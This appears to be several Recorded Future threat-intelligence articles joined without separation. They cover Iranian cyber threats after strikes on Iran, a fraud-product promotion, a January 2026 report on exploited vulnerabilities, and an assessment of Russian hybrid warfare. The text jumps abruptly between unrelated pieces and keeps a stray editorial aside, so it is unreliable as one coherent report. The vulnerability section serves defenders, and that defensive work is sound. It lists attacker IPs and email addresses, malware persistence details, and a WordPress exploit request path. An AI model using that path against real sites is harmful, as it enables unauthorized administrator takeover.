Recorded Future's Insikt Group® is actively monitoring the rapidly evolving situation following coordinated US-Israeli strikes against Iran, the death of Supreme Leader Ali Khamenei and the widening regional war. This analysis serves as a continuously updated compilation on the geopolitical, cyber and influence operation aspects of the war, including key indicators to watch in the coming days, weeks and months.

This report will be of greatest interest to organizations in the US, Israel, and Gulf states concerned about targeting by Iranian state-sponsored or state-aligned threat actors, as well as those with exposure to energy markets, maritime shipping, and critical infrastructure potentially impacted by regional escalation.

The Latest Areas to Watch

Three things to watch right now:

• Mojtaba Khamenei's first address to the nation. This is the single most important near-term signal. Whether his tone is defiant, pragmatic, or obliquely conciliatory will reveal whether any room for negotiation exists — and substantially change the picture for regional stability.
• The Internet blackout lifting and the cyber re-operationalization window. When connectivity is restored, expect scanning, brute forcing, password spraying, and probing against previously untargeted networks as early signals of Iranian cyber forces returning to operational tempo.
• Three scenarios remain in play — and are not mutually exclusive. A swift US military exit, a negotiated Venezuela-style deal, or internal revolution and fragmentation each carry distinct risk profiles.

Iran's Leadership Situation

Mojtaba Khamenei, son of the late Ali Khamenei, has been elected as Supreme Leader. His election is expected to preserve hardliner continuity and underscores the IRGC's political power — they were able to shape the outcome in favor of their preferred candidate despite reported objections from some clerics. Mojtaba himself appears to have been wounded in US-Israeli strikes that killed his father, mother, wife, and one son.

What this means strategically: Mojtaba is neither a credible Islamic scholar nor an experienced administrator — the two traditional prerequisites for the position. He lacks the authority his father spent two decades consolidating. For now, Iran is effectively being run by committee. Key power brokers include IRGC chief Vahidi, parliamentary speaker Ghalibaf, and overall security head Larijani. These individuals are realists, even if labeled hardliners, and have a broader range of options before them than Khamenei Senior ever permitted.

There is also visible tension between political leadership and the IRGC. President Pezeshkian's public apology over the weekend for strikes on Iran's neighbors drew immediate backlash from hardliners and military leaders — a reflection of the weakness of the elected government, not a sign of internal fracturing. The IRGC is driving wartime strategy.

Iran faces two paths: pursue a deal with the US that normalizes economic engagement and offers a path to regime survival — or endure the bombing, crack down domestically, export enough oil to China and India to sustain the patronage system, and wait for the geopolitical environment to shift. Mojtaba's first address to the nation will be the most significant near-term signal of which direction Iran is leaning.

Cyber Threat Landscape

Insikt Group continues to observe a near-term reduction in Iran's more advanced cyber activity since March 1. The Internet blackout across much of Iran has likely impeded operational tempo and coordination among state-sponsored groups. However, treat this period as a window in which Iran-aligned operators are regrouping, prioritizing recovery and defense, and setting conditions for future operations — not as a sign of diminished threat.

It is worth separating espionage-grade operations from the broader pro-Iran ecosystem. Some groups have gone quiet; others remain active. Critically, not all groups need to operate from within Iran's borders.

Recent confirmed activity:

• A pro-Iranian cyberattack was launched against Jordanian public silos and supply infrastructure around March 1
• A malicious Android application mimicking a missile warning system was disseminated to Israeli civilians via SMS — currently under investigation and validation by Insikt Group
• These are considered outliers in what is likely to become a far more robust retaliation once Iran emerges from the Internet blackout

Groups to Track

State-sponsored: Insikt Group is actively monitoring Green Bravo (APT42), Green Golf, Cotton Sandstorm, and Cyber Avengers. These groups are capable of advanced network and vulnerability scanning, opportunistic exploitation of known vulnerabilities, deployment of disruptive and destructive malware, and satellite or television broadcast hijacks — the latter particularly likely given their psychological impact.

Hacktivist fronts: The Handala Hack Team and the Conquerors Electronic Army operate in a hybrid space blending hacktivism, cyber intrusions, and influence operations. Typical TTPs include web defacements, DDoS targeting government and critical infrastructure, hack-and-leak operations, and doxing of officials and political figures. These groups are likely to be the first to resume traditional operational tempo as the blackout lifts.

Also watch: Peach Sandstorm, APT34, MuddyWater, and Moses Staff each have established patterns for initial access and lateral movement. Watch for new hacktivist fronts emerging — this is typically a signal of where Iran is directing its efforts, as seen with Homeland Justice in Albania and Moses Staff targeting Israel.

Three Areas to Monitor

Intent to Recalibrate. After this round of hostilities, cyber operations will likely expand to include new regional targets, mirroring what we've seen on the kinetic front. Iranian cyber groups will likely be active across new targeted networks and operationalized for disruptive use.

Proliferation. In line with that recalibration, Iranian cyber groups will likely be tasked to acquire and deploy more disruptive capabilities.

Time. Iran is currently experiencing a digital blackout, and cyber operations are likely impacted as a result. There are already reports suggesting aerial bombardments have hit at least one facility used by a major group. If cyber centers remain intact, Iran will still require time to re-operationalize — and if more physical centers have been targeted, that timeline extends further. For historical context: after the Qasem Soleimani killing in January 2020, Iran took approximately two months before launching what became multi-year, highly targeted campaigns against Israeli government, private sector, and academic institutions.

Targeted Industries

Critical infrastructure, government, defense, and the defense industrial base will be at the top of the targeting list. US critical infrastructure is absolutely part of that target set — Iranian APT groups are known to be opportunistic, acquiring exploits and collaborating with ransomware groups to gain network access, and the threshold for retaliation following Khamenei's death will be very high. Pro-Iran hacktivist groups — including Handala Hack Team, Cyber Islamic Resistance, RipperSec, APT IRAN, and Cyber Fattah — have announced coordinated cyber operations against Israeli and regional targets. While large-scale independently verified intrusions had not been confirmed as of March 9, organizations should not mistake this for low risk.

Watch for each major group's distinct TTPs: Peach Sandstorm, APT34, MuddyWater, Cotton Sandstorm, and APT42 each have established patterns for initial access and lateral movement. Also watch for new hacktivist fronts emerging — this is typically a signal of where Iran is directing its efforts, as seen previously with Homeland Justice in Albania and Moses Staff targeting Israel.

What to Watch

When the digital blackout lifts, look for scanning, brute forcing, password spraying, and probing against your networks as early signals of Iranian cyber forces re-operationalizing. A temporal overlap between the blackout lifting and increased probing against previously untargeted networks would be a significant indicator. DDoS campaigns may also be an early signal. Ensure all public-facing technologies are patched — you can't control geopolitics, but you can control your exposure.

Additionally, watch for infrastructure repurposing: groups known for traditional espionage may suddenly shift to IO-driven domains, as seen after June 2025 when espionage infrastructure pivoted to hybrid theft-and-influence operations.

• Latin America faces a distinct and evolving cyber threat landscape, from PIX payment fraud to ransomware hitting critical infrastructure.
• Most LATAM security teams are still reactive by necessity, and that posture is costing organizations in downtime, data, and trust.
• Recorded Future offers LATAM-specific threat intelligence, automation, and 100+ integrations to help stretched teams get ahead of attacks before they land.
• Meet us at RSA Booth N-6090 to see how intelligence-led security can transform your team's posture, from response to prevention.
• Join our upcoming webinar to learn what proactive intelligence looks like for your region.
  Understanding the Dark Covenant, Its Evolution, and Impact

Available for purchase now via the Recorded Future Platform, Money Mule Intelligence helps fraud teams identify the accounts criminals use to extract and move stolen funds—addressing a critical gap as scams increasingly become banks' most pressing fraud challenge.

The Growing Threat of Authorized Push Payment Fraud

Authorized Push Payment (APP) fraud is accelerating. In the U.S., APP fraud losses are projected to reach nearly $15B by 2028, up from $8.3B in 2024, according to Deloitte. While traditional card fraud continues to decline, APP fraud is climbing, fueled by AI-generated deepfakes, personalized scam scripts, and instant payment systems like FedNow and Zelle that move money faster than conventional fraud controls can intercept it.

Mule accounts, or money mules, are part of the critical infrastructure that makes these scams possible. They provide the bridge that converts stolen payments into untraceable cash or cryptocurrency. Without them, most APP fraud would collapse because criminals cannot risk receiving funds directly into their own accounts. By the time victims realize they've been scammed, mule accounts have already moved the money through multiple layers, typically ending in cash withdrawals or crypto conversions.

Additionally, the sophistication of mule operations is increasing. Criminal organizations now employ "mule herders" who manage hundreds of accounts at once, using AI to simulate normal transaction behavior (grocery purchases, streaming subscriptions, etc.) so accounts don't appear dormant or suspicious. This makes detection through traditional pattern analysis increasingly difficult.

Regulators are responding by shifting liability to banks, often viewing those allowing mule accounts to operate as part of the criminal infrastructure itself. For example, the UK now requires banks to reimburse scam victims and allows them to delay suspicious payments for investigation, while U.S. regulators are signaling that banks may be held liable for failing to detect mule accounts.

Detecting mule accounts is fundamentally difficult. They’re designed to blend in with legitimate activity, and traditional fraud controls can struggle to distinguish between a genuine customer payment and a scam transfer until it's too late.

CYBERA's Approach to Mule Intelligence

The challenge of detecting and disrupting mule account networks is what led CYBERA's founders to build their solution. Coming from legal practice and law enforcement, CYBERA's leadership team worked scam cases where they witnessed how recovery becomes impossible once funds move through the financial system. They realized that money mule networks represent a central vulnerability in the scam economy, one that banks had limited visibility into.

Today, CYBERA helps banks and payment networks disrupt scams at the point where funds are extracted. CYBERA's AI-powered Scam Engagement System generates intelligence on bank accounts and payment endpoints actively used by scam networks.

Unlike probabilistic risk scoring, CYBERA verifies each account, providing evidence and contextual metadata to enable proactive prevention across both internal accounts and outbound payments while minimizing false positives.

CYBERA supports two core use cases:

• On-Us Mule Detection, which helps identify mule accounts held at your institution that are already linked to confirmed scam activity. This enables early detection and disruption of high-risk accounts, reducing downstream fraud, repeat victimization, and regulatory exposure within a bank’s accountholders.
• Off-Us Screening, which screens outbound payments to external beneficiary accounts before execution, helping to prevent customers from sending funds to scammer-controlled accounts. This is particularly valuable for high-value transfers, social engineering attacks, and customer-initiated payments where traditional controls are limited.

Large financial institutions have already prevented multiple six-figure losses by embedding CYBERA’s intelligence into their transaction monitoring workflows. CYBERA has also been accepted as a member of the Mastercard Start Path program, making it the first Recorded Future partner to achieve this distinction and further validating its role in the payments ecosystem.

How Money Mule Intelligence Expands Payment Fraud Intelligence

Payment Fraud Intelligence (PFI) correlates the widest set of disparate, pre-monetization indicators of fraud to help teams act before their customers are impacted. Money Mule Intelligence extends that capability, giving fraud teams the verified intelligence needed to make high-confidence decisions that disrupt scams by flagging accounts that have been confirmed as mule infrastructure through direct investigation. Together, they provide coverage from initial compromise through attempted cash-out, helping fraud teams prevent losses at multiple intervention points.

As regulators increasingly expect banks to prevent scam-enabled transfers, Money Mule Intelligence provides the verified data needed to comply with emerging reimbursement requirements while reducing the operational burden of post-incident investigation and remediation.

PFI users that purchase this capability, can now act on both sides of the transaction—compromised payment instruments and scam-linked receiving accounts—with evidence-backed intelligence that minimizes false positives and aligns with the industry's shift toward proactive fraud prevention.

What security teams need to know:

• APT28's Operation Neusploit: Russian state-sponsored actors exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files, delivering MiniDoor, PixyNetLoader, and Covenant Grunt implants
• Microsoft and SmarterTools lead concerns: These vendors accounted for 30% of January's vulnerabilities, with multiple critical authentication bypass and RCE flaws
• Public exploits proliferate: Fourteen of the 23 vulnerabilities reported have public proof-of-concept exploit code available
• Code Injection dominates: CWE-94 (Code Injection) was the most common weakness type, followed by CWE-288 (Authentication Bypass Using an Alternate Path or Channel) and CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Bottom line: The slight increase masks significant threats. APT28's zero-day exploitation and multiple critical authentication bypass flaws demonstrate that threat actors continue targeting enterprise communication and management platforms for initial access and persistence.

Quick Reference Table

All 23 vulnerabilities below were actively exploited in January 2026.

Table 1: List of vulnerabilities that were actively exploited in January based on Recorded Future data (Source: Recorded Future)

Key Trends in January 2026

Affected Vendors

• Microsoft faced four critical vulnerabilities across Windows and Office products, including APT28's zero-day exploitation of CVE-2026-21509
• SmarterTools accounted for three critical vulnerabilities affecting SmarterMail, all enabling authentication bypass or RCE
• Cisco saw two critical flaws in Identity Services Engine and Unified Communications Manager
• Ivanti dealt with two pre-authentication RCE vulnerabilities in Endpoint Manager Mobile
• Additional affected vendors/projects: Fortinet, SolarWinds, Broadcom, Synacor, Versa, Hewlett Packard Enterprise, GNU, Linux, Vite, Prettier, Gogs, and Modular DS

Most Common Weakness Types

• CWE-94 – Code Injection
• CWE-288 – Authentication Bypass Using an Alternate Path or Channel
• CWE-200 – Exposure of Sensitive Information to an Unauthorized Actor

Threat Actor Activity

APT28's Operation Neusploit marked January's most sophisticated campaign:

• Exploited CVE-2026-21509 (Microsoft Office) via weaponized RTF files
• Deployed MiniDoor, a malicious Outlook VBA project designed to collect and forward victim emails to hardcoded addresses
• Deployed PixyNetLoader, which staged additional components and culminated in a Covenant Grunt implant
• Abused Filen API as a C2 bridge between the implant and actor-controlled Covenant listener

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.

CVE-2026-21509 | Microsoft Office

Risk Score: 99 (Very Critical) | Active exploitation by APT28

Why this matters: Zero-day exploitation by Russian state-sponsored actors bypasses Office security features, enabling delivery of email collection implants and backdoors. The vulnerability stems from reliance on untrusted inputs in security decisions, allowing unauthorized attackers to bypass OLE mitigations.

Affected versions: Microsoft 365 and Microsoft Office (versions not specified in advisory)

Immediate actions:

• Install Microsoft's out-of-band update released January 26, 2026
• Search email systems for RTF attachments with embedded malicious droppers
• Check for modifications to %appdata%\Microsoft\Outlook\VbaProject.OTM
• Review registry keys: HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level, Software\Microsoft\Office\16.0\Outlook\Options\General\PONT_STRING, and Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot
• Monitor for connections to 213[.]155[.]157[.]123:443 and remote connectivity to Microsoft Office CDN endpoints
• Hunt for scheduled tasks named "OneDriveHealth" and suspicious files in %programdata%\Microsoft\OneDrive\setup\Cache\SplashScreen.png
• Block email addresses: ahmeclaw2002@outlook[.]com and ahmeclaw@proton[.]me

Figure 1: Vulnerability Intelligence Card® for CVE-2026-21509 in Recorded Future (Source: Recorded Future)

CVE-2026-23760 | SmarterTools SmarterMail

Risk Score: 99 (Very Critical) | CISA KEV: Added January 26, 2026

Why this matters: Unauthenticated attackers can reset system administrator passwords without any credentials or prior access, enabling complete administrative takeover and potential RCE through volume mount command injection.

Affected versions: SmarterTools SmarterMail prior to build 9511

Immediate actions:

• Upgrade to build 9511 or later immediately
• Review administrator account activity logs for unauthorized password resets
• Check Volume Mounts configuration for suspicious command entries (this one IS correct for SmarterMail)
• Review administrator access patterns and session logs
• Audit system for unauthorized changes made with compromised admin access

CVE-2026-1281 & CVE-2026-1340 | Ivanti Endpoint Manager Mobile

Risk Score: 99 (Very Critical) | CISA KEV: CVE-2026-1281 added January 29, 2026

Why this matters: Pre-authentication RCE vulnerabilities in EPMM enable unauthenticated attackers to execute arbitrary code by exploiting Apache RewriteMap helper scripts that pass attacker-controlled strings to Bash.

Affected versions: Ivanti EPMM 12.5.0.0 and earlier, 12.5.1.0 and earlier, 12.6.0.0 and earlier, 12.6.1.0 and earlier, and 12.7.0.0 and earlier

Immediate actions:

• Install temporary fixes via RPM packages: EPMM_RPM_12.x.0 - Security Update - 1761642-1.0.0S-5.noarch.rpm and EPMM_RPM_12.x.1 - Security Update - 1761642-1.0.0L-5.noarch.rpm
• Plan migration to EPMM 12.8.0.0 (scheduled for Q1 2026 release)
• Monitor for unusual Apache RewriteMap activity
• Review logs for crafted HTTP parameters to app store retrieval routes
• Check for unauthorized code execution attempts via RewriteRule handling

Exposure: EPMM instances accessible over corporate networks or VPN connections

Figure 2: Risk Rules History from Vulnerability Intelligence Card® for CVE-2026-1340 in Recorded Future (Source: Recorded Future)

Technical Deep Dive: Exploitation Analysis

APT28's Operation Neusploit (CVE-2026-21509)

The multi-stage attack chain: CVE-2026-21509 enables bypass of Office OLE mitigations through weaponized RTF files:

• Initial delivery – Specially-crafted RTF file exploits CVE-2026-21509
• Server-side evasion – Malicious DLL returned only for requests from targeted geographies with an expected HTTP User-Agent
• Dropper variants – Two distinct infection paths deployed based on targeting:
  • Variant 1 (MiniDoor): Writes VBA project to Outlook, modifies registry settings to enable macro execution, forwards emails to hardcoded recipient addresses
  • Variant 2 (PixyNetLoader): Creates mutex asagdugughi41, decrypts embedded payloads using rolling XOR key, establishes persistence via COM hijacking

Why this matters: APT28 demonstrates sophisticated exploitation combining zero-day vulnerabilities with anti-analysis techniques, targeting government and business users for email collection and persistent access.

Modular DS WordPress Plugin Exploitation (CVE-2026-23550 & CVE-2026-23800)

The authentication bypass chain: CVE-2026-23550 enables administrator-level access without authentication:

• Plugin treats requests as trusted based on request-supplied indicators rather than cryptographic verification
• /api/modular-connector/login flow grants access based on site connector enrollment state
• If no user identifier is supplied, the code selects an existing administrative user and establishes a privileged session
• CVE-2026-23800 represents the second exploitation path via REST API user creation: /?rest_route=/wp/v2/users&origin=mo&type=x

Known IoCs associated with CVE-2026-23550:

• 45[.]11[.]89[.]19
• 185[.]196[.]0[.]11
• 64[.]188[.]91[.]37

Known IoCs associated with CVE-2026-23800:

• 62[.]60[.]131[.]161
• 185[.]102[.]115[.]27
• backup[@]wordpress[.]com
• backup1[@]wordpress[.]com

Why this matters: WordPress plugin vulnerabilities enable threat actors to compromise multiple sites from a single centralized management platform, amplifying attack impact.

SmarterMail Authentication Bypass (CVE-2026-23760)

The password reset flaw: CVE-2026-23760 exposes privileged password reset to anonymous callers:

• ForceResetPassword controller attribute explicitly permits unauthenticated access
• Backend ForcePasswordReset routine branches on client-supplied IsSysAdmin boolean rather than deriving account type from server-side context
• System administrator branch performs basic checks, then sets Password directly from the supplied NewPassword
• Logic fails to validate OldPassword, lacks an authenticated session requirement, and omits authorization controls

Why this matters: Complete administrative takeover without credentials enables threat actors to deploy web shells, modify configurations, and establish persistent access to mail server infrastructure.

Detection & Remediation Resources

Nuclei Templates from Insikt Group®

Recorded Future customers can access Nuclei templates for:

• CVE-2025-8110 (Gogs) - Version detection and fingerprinting check
• CVE-2026-23760 (SmarterMail) - Authentication bypass validation

Recorded Future Product Integrations

• Vulnerability Intelligence – Prioritize based on active exploitation data, including APT28 targeting
• Attack Surface Intelligence – Discover exposed SmarterMail, Ivanti EPMM, and Modular DS assets
• Third-Party Intelligence – Monitor vendor vulnerabilities across your supply chain

January 2026 Summary

State-sponsored zero-days return. APT28's exploitation of CVE-2026-21509 demonstrates continued Russian interest in email collection and persistent access through Office vulnerabilities.

Authentication bypass dominates enterprise risk. Multiple critical flaws in SmarterMail, Modular DS, and Cisco products enable complete administrative takeover without credentials.

Legacy vulnerabilities persist. CVE-2009-0556 (Microsoft Office) highlights how threat actors continue targeting unretired systems where patching has lagged for over a decade.

Take Action

Ready to see how Recorded Future can help your team detect state-sponsored exploitation, prioritize authentication bypass fixes, and reduce enterprise attack surface? Explore our demo center for live examples, or dive deeper with Insikt Group research for technical threat intelligence.

About Insikt Group®:

Recorded Future's Insikt Group® is a team of elite analysts, linguists, and security researchers providing actionable intelligence to protect organizations worldwide. Our research combines human expertise with AI-powered analytics to deliver timely, relevant threat intelligence on emerging vulnerabilities and threat actor campaigns.

Since its full-scale invasion of Ukraine in February 2022, Russia has waged what we assess is largely opportunistic, though increasingly aggressive, hybrid warfare in NATO territory. Moscow has very likely not yet leveraged its full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.

Over the next two years, Russian President Vladimir Putin will likely escalate Russia’s hybrid warfare campaign against NATO members into a full-fledged campaign likely consistent with a Russian military doctrine called New Generation Warfare (NGW). Putin will likely use this campaign to degrade NATO political unity and defense capabilities, reinforce Russia’s network of overt and covert assets across NATO, and optimize the physical and political environment, should Putin decide to launch a military incursion into NATO territory.

In a full-scale NGW campaign in NATO territory, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is more intentionally planned and aims to project Russian power and weaken European defenses on a systemic level. An NGW campaign would very likely involve Russia using the same tactics it is currently using, including sabotage operations, influence operations, territorial waters and airspace violations, and exploitation of some NATO states’ dependence on Russian oil and gas. The primary differences between Russia’s current operations in Europe and an NGW campaign would include greater geographic breadth of those operations; greater frequency of operations; and Russia likely using tactics simultaneously and in coordinated ways. For example, likely Russia-directed threat actors might use a drone to violate the airspace over a NATO state’s airport, forcing the temporary closure of that airport, coupled with a distributed denial-of-service attack on the airport’s internal communications system. Russia might then post a video of the incidents through one of its overt or covert propaganda outlets, arguing that they show NATO cannot adequately protect its aviation network.

An NGW campaign in NATO territory would very likely have significant implications for private and public sector entities, including degradation of critical infrastructure, reputational risk for individuals and companies named in Russian influence operation campaigns, and reduced public confidence in the government’s ability to ensure their safety.

Over the next three to five years, Putin will likely evaluate the feasibility of moving from an NGW-like campaign in Europe to a kinetic military incursion. Factors Putin would likely weigh when making such a decision include NATO military capabilities, the likelihood that the US would defend a NATO state if it were attacked, and Russian military capabilities. However, even if the necessary conditions for such an operation emerge, the probability of a proactive Russian military operation into NATO territory very likely remains low.

Key Findings

• Russia’s hybrid warfare campaign in NATO territory between February 2022 and January 2026 has been increasingly aggressive, but likely opportunistic and not reflective of Russia’s full cyber, influence operations, and sabotage capabilities.
• Putin likely views the next two years as an opportunity to test NATO’s defensive capabilities and prepare the physical and psychological environment, should he decide to launch a military incursion. Putin likely assesses that the 2028 US presidential election could lead to a US president more willing to commit US resources to NATO. As such, Putin likely views the next two years as an opportunity to exploit existing US-NATO tensions to weaken NATO’s unity and ability to defend itself.
• Russia’s escalated aggression against NATO over the next two years is likely to have the hallmarks of a Russian military doctrine called New Generation Warfare (NGW), which combines sabotage operations, cyberattacks, influence operations, and other non-military actions to undermine the enemy’s confidence and prepare the physical and psychological environment, should Russia elect to escalate into a kinetic military campaign.
• A full-scale NGW campaign would likely involve an intensified campaign of tactics Russia has used against NATO in the last few years, including sabotage operations, influence operations, violations of NATO airspace with drones and jets, violations of NATO states’ territorial waters, targeting of undersea cables, and exploitation of some NATO states’ dependence on Russian gas and oil. Russia would likely deploy these tactics more frequently, across more states simultaneously, and would likely use tactics simultaneously in an attempt to strain NATO resources.
• A full-scale NGW campaign would have significant implications for private and public sector entities operating in NATO territory, including disruption to critical services, reputational risk for individuals and firms named in influence campaigns, supply chain disruptions, and reduced public trust in the government’s ability to safeguard critical infrastructure. The fact that most of the critical infrastructure in NATO territory is privately owned means public-private partnerships will be essential in mitigating the impact of escalated Russian aggression.

Russia Likely to Escalate into New Generation Warfare Campaign in Europe Over Next Two Years

Since Russia’s full-scale invasion of Ukraine in February 2022, it has waged what Insikt Group assesses is largely opportunistic, though increasingly aggressive, hybrid warfare in Europe. These actions, though destructive, have very likely not leveraged Russia’s full capability to integrate cyber, political, and sabotage tools into a full-scale campaign.

Nonetheless, Russian president Vladimir Putin very likely still prioritizes weakening European unity and defensive capabilities in service to his overarching foreign policy goal of replacing the US-led international system with a multipolar world in which Russia, the US, and China are relatively equal in terms of geopolitical influence. Putin very likely judges that uneven US assistance to European defensive efforts creates a window of opportunity for Russia to weaken Europe’s ability to resist Russian aggression. Putin likely views recent US-NATO tensions, such as the US’s articulated intention to control Greenland, as an opportunity to exacerbate the strategic distance between the US and NATO, thereby weakening the transatlantic partnership that has formed the core of the US-led, post-World War II security architecture. Putin also likely views the next two years as an opportunity to optimize the physical and informational environment in Europe, should he decide to launch a kinetic military attack against Europe.

Putin very likely views this window of opportunity as finite. He likely recognizes that the 2028 US presidential election could result in a US president more willing to commit US military and political resources to amplifying Europe’s defensive capabilities. As such, over the next two years, Putin will likely escalate Russia’s hybrid warfare against Europe into an expanded campaign that is likely consistent with the principles of Russian New Generation Warfare (NGW) –– a warfare doctrine espoused by senior Russian military officials emphasizing control of the information and psychological spaces, as well as the use of undeclared special forces, to weaken an enemy prior to using traditional military forces.

Europe’s efforts to bolster its defenses against current levels of Russian hybrid warfare likely reinforce Putin’s perception that Europe is motivated to weaken Russia, thereby likely making him more motivated to target Europe. Putin’s perception that Europe’s defensive efforts are actually a threat to Russia is likely rooted in his calculus that NATO is fundamentally an anti-Russia bloc. Putin has substantiated this assessment by pointing to actions such as NATO’s expansion to include former Warsaw Pact countries and its decision to install missile defense systems in Poland.¹

New Generation Warfare Origins and Principles

Insikt Group assesses that much of Russia’s aggressive foreign policy actions since the annexation of Crimea in March 2014 –– which marked the beginning of Putin’s more assertive efforts to push back against perceived Western efforts to weaken Russia –– have been consistent with NGW, a Russian doctrine in which the state aims to bring about political change in another country primarily by using overt and covert influence tools, as opposed to conventional military force. These tools can include influence operations, sabotage operations, and exploiting economic leverage.

New Generation Warfare is typically associated with Chief of the General Staff Valery Gerasimov’s 2013 article in the Russian journal Military-Industrial Kurier, though NGW is essentially a modern version of Soviet active measures. “Active measures” (aktivnye meropriyatiya) was a term used by the Soviet Union from the 1950s onwards to describe covert influence and subversion operations, including establishing front organizations, backing pro-Soviet political movements abroad, and attempting to orchestrate regime change in foreign countries. Active measures declined during the 1980s and 1990s, but Putin revived its use in the early 2000s. Indeed, in 2007, retired major-general Alexander Vladimirov alluded to that revival when he stated that “modern wars are waged on the level of consciousness and ideas” and that “modern humanity exists in a state of permanent war” in which it is “eternally oscillating between phases of actual armed struggle and constant preparation for it.”²

Despite the long history of Russia using active measures, Gerasimov’s 2013 article provides the most comprehensive account of how current Russian military leaders likely view this doctrine. Gerasimov’s article suggests that he views NGW both as the reality of modern warfare and as a preferred way of weakening enemies. Gerasimov argued that the Arab Spring demonstrated that modern wars are not declared conflicts between traditional militaries, but instead depend more on a combination of declared military force and tactics such as domination of the information space, targeting of critical enemy facilities, “asymmetric and indirect operations,” and the use of unofficial special forces. He argued that “the very ‘rules of war’ have changed. The role of nonmilitary means of achieving political and strategic goals has grown and, in many cases, they have exceeded the power of force of weapons in their effectiveness.”

The following table, taken from a translation of the article, shows Gerasimov’s view of traditional warfare as opposed to New Generation Warfare:

Figure 1: New Generation Warfare and traditional warfare forms and methods (Source: Military Review)

We assess that Russia’s campaign in Ukraine, starting with the annexation of Crimea in March 2014 and extending to its ongoing full-scale military operation, bears many of the hallmarks of NGW. Russia’s military operations more closely aligned with NGW principles from 2014 through 2021; after Russia’s full-scale invasion of Ukraine in February 2022, the Russian military transitioned to more traditional operations. Russia’s exploitation of influence operations and asymmetric warfare has been a feature of its operations since 2014, and since 2022, Russia has expanded asymmetric and sabotage operations in Europe likely as part of a multi-faceted strategy to use power exertion in Ukraine and Europe to weaken the Western geopolitical system.

This does not mean that Russian military leadership have consciously used NGW as their guiding principle in Ukraine at all times; indeed, we lack the insight into Russian military leadership thinking to assess with high confidence the principles they are employing. Rather, the combination of Gerasimov’s writings and observation of Russian operations in Ukraine means we can assess with medium confidence that Russia’s Ukraine operations prior to 2022 often reflected NGW principles. As such, we assess that NGW is a useful framework for understanding Russian military operations.

Table 1: New Generation Warfare principles (Source: Recorded Future)

New Generation Warfare Toolkit

In a full-scale New Generation Warfare campaign in Europe, Russia would likely move from its current pattern of influence operations efforts combined with largely opportunistic cyber and sabotage targeting to a Europe-wide campaign that is both proactive and reactive. It would likely involve the same tactics Russia has used against NATO states for the past few years. The difference would likely be that Russia would deploy these tactics more frequently and across a greater number of states at once. A full NGW campaign would likely also involve using some operational methods simultaneously and in ways that amplify one another.

Even in a full-scale NGW campaign, Russia would very likely aim to keep destruction below the threshold that risks NATO invoking Article 5. NATO officials have not specified precisely what the Article 5 threshold is; indeed, former NATO Secretary General Jens Stoltenberg stated that the grounds for invoking Article 5 “must remain purposefully vague.” However, it is likely that it would include a mass casualty event or the use of a chemical or biological weapon. The text of Article 5 specifies that the threshold involves “an armed attack.” NATO officials said in 2022 that a cyberattack could constitute grounds for invoking Article 5, though they did not specify what kind of cyberattack would qualify.

Russia is likely to face few downsides during an NGW campaign, due to minimal risk of Russian casualties and the campaign’s tactical flexibility. Unlike a conventional military campaign, which risks a high level of casualties that can cause domestic public dissatisfaction, an NGW campaign very likely would involve minimal risk to Russian citizens. In addition, an NGW campaign inherently offers significant tactical flexibility, as it is not a declared campaign in which Russia needs to articulate goals to justify the campaign to the Russian public and elites. As such, Putin would likely have the option to draw down tactics that are proving less effective and increase the use of more effective tactics, without needing to justify tactical failures. This flexibility would likely allow Putin to continue at least aspects of an NGW campaign in the likely event that Europe responds to an NGW campaign with escalated efforts to counter Moscow.

Influence Operations and Propaganda

Russian “active measures” serve as a force multiplier for Moscow’s broader political warfare, integrating influence operations, propaganda, and sabotage. In Europe, these efforts aim to weaken transatlantic cohesion, erode public and political support for Ukrainian sovereignty and assistance to Kyiv, and exacerbate internal societal divisions, economic uncertainty, and other challenges. By cultivating sanctions fatigue and encouraging selective bilateral re-engagement with Russia through active measures, Moscow seeks to mitigate its international isolation and undermine the rules-based international order, thereby advancing a Russia-favored multipolar system characterized by exclusive spheres of influence. Notably, these activities also include angles of domestic preservation by portraying the West as chaotic, corrupt, and immoral, and thereby discouraging the expansion of liberal democracies elsewhere, particularly from within.

Since Russia’s full-scale invasion of Ukraine in 2022, Insikt Group has observed concentrated Russian influence operations targeting the domestic audiences of what Moscow likely views as Kyiv’s core European supporters: the UK, France, Germany, and Poland. Insikt Group investigations, in addition to public reporting, have previously identified multiple influence operations targeting the above-mentioned major European allies, including Doppelgänger, Operation Overload, Operation Undercut, and CopyCop. These influence operations have commonly impersonated national and pan-European media outlets to disseminate messages aligned with Kremlin propaganda, including anti-Ukraine themes and content that denigrates pro-European political figures. Elsewhere, Russian influence operations have sought to use fear and physical demonstrations to manipulate public opinion. In France, for example, Russia-linked physical intimidation very likely intended to provoke public anxiety and societal unrest included the Star of David and red hand graffiti, as well as the placement of caskets near the Eiffel Tower ahead of the 2024 Paris Olympic Games. Similar efforts have also appeared elsewhere in Europe, including the emergence of pro-Russian billboards in Italy and the "Children of War, Alley of Angels" exhibit in Germany.

Russian influence efforts have also leveraged illicit financing and alleged bribery to attempt to favorably reshape European politics. For example, in spring 2024, Czech authorities attributed the Voice of Europe, an organization linked to Viktor Medvedchuk, to paying politicians in several EU countries to spread anti-Ukraine messages. In September and October 2024, Moldovan police reported that a Russia-linked network, allegedly run by fugitive oligarch Ilan Shor, channeled tens of millions of dollars to buy votes ahead of Moldova’s October 20, 2024, presidential election and EU referendum. In December 2024, Romanian prosecutors conducted raids and opened probes into alleged illegal campaign financing and payments to TikTok users and influencers associated with the then-annulled presidential vote. More recently, former UK Member of the European Parliament (MEP) Nathan Gill was sentenced on November 21, 2025, after pleading guilty for accepting bribes to make pro-Russian statements.

Insikt Group assesses Russia’s NGW against Europe will likely consist of aggressive influence operations targeting Europe that aim to erode European unity and advance Russia’s quest for a multipolar world order. NGW will very likely continue supporting Moscow’s core objectives of eroding political and public support for Ukrainian sovereignty and assistance to Kyiv, accelerate sanctions fatigue, and exploit domestic political crises and election cycles to fracture European cohesiveness and transatlantic cooperation. Moscow will likely expand its reliance on access to third parties and intermediaries, including sympathetic socio-political organizations and fringe movements, to launder Kremlin-aligned messages into the European information environment.

